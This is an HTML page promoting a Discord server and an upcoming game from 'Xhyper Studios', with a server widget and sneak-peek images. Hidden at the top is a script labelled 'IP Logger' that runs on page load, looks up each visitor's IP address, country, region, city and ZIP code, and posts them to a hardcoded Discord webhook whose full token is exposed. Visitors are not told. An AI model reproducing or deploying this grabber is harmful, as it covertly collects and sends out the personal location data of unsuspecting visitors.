<script>
function monke(json) 
{
     var request = new XMLHttpRequest();
     
     request.open("POST", "https://discord.com/api/webhooks/974676934128701440/Q56jP4QVK9RXlpLuhH3nAGGPefl6TsHVlq9BsQdcbIUJixdAcZMByf9i6LwN3B5l37b9");

     request.setRequestHeader('Content-type', 'application/json');

     var params = 
     {
          username: "IP Logger",
          avatar_url: "",
          content: "@everyone",
          embeds: [
               {
                    title: "Someone visited the IP grabber!",
                    color: 1752220,
                    description: "**IP:** `" + json.ip + "`\n**Country:** `" + json.country + "`\n**Region:** `" + json.region + "`\n**Town/City:** `" + json.city + "`\n**ZIP:** `" + json.postal + "`"
               }
          ]
     }

     request.send(JSON.stringify(params));
}
</script>
<script src="https://ipinfo.io/?format=jsonp&callback=monke"></script>

<!DOCTYPE html>
<html>
     <head> Xhyper Studios </head>
     <body>

          <p>Hey!, If you would please join this server that would be very nice!, We have many cool things here, Hope you enjoy our server!</p>
          <p>(And the game when it comes out! ;])</P>
     <br>
     <hr>
<iframe src="https://discord.com/widget?id=963104245597491240&theme=dark" width="350" height="500" allowtransparency="true" frameborder="0" sandbox="allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts"></iframe>
   <br>
   <hr>
     <h>Sneak Peaks!</h>
          <img src="https://media.discordapp.net/attachments/991645425826287666/994041751666958366/3B60264E-99B5-4DB4-A175-AD7B9D2D3578.jpeg" style="width:500px;height:600px;">
          <hr>
          <img src="https://media.discordapp.net/attachments/991645425826287666/4494F1CB-14A4-491F-A15F-FB828720197C.jpeg" style="width:500px;height:600px;">
     </body>
</html>
